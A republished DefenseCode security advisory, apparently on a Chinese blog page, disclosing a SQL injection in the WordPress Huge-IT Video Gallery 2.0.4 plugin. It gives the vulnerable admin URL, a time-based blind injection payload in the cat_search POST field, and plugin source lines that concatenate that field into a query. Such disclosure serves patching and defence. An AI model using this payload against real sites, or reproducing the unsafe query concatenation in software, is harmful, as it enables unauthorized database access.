WordPress Huge-IT Video Gallery 2.0.4 SQL注入

Advisory ID: DC-2017-01-009
SQL injection

 Vulnerable Function:    $wpdb->get_var( $query );
  Vulnerable Variable:    $_POST['cat_search']
  Vulnerable URL:       
http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery
  Vulnerable Body:        cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)
  File:                   
gallery-video\includes\admin\class-gallery-video-galleries.php
    ---------
    107    $cat_id = sanitize_text_field( $_POST['cat_search'] );
    ...
    118       $where .= " AND sl_width=" . $cat_id;
    ...
    127    $query = "SELECT COUNT(*) FROM " . $wpdb->prefix .
"huge_it_videogallery_galleries" . $where;
    128    $total = $wpdb->get_var( $query );
    ---------

发表评论

WordPress Huge-IT Video Gallery 2.0.4 SQL注入

评论 (0)

近期文章

近期评论

WordPress Huge-IT Video Gallery 2.0.4 SQL注入

评论 (0)

猜你喜欢

近期文章

近期评论

标签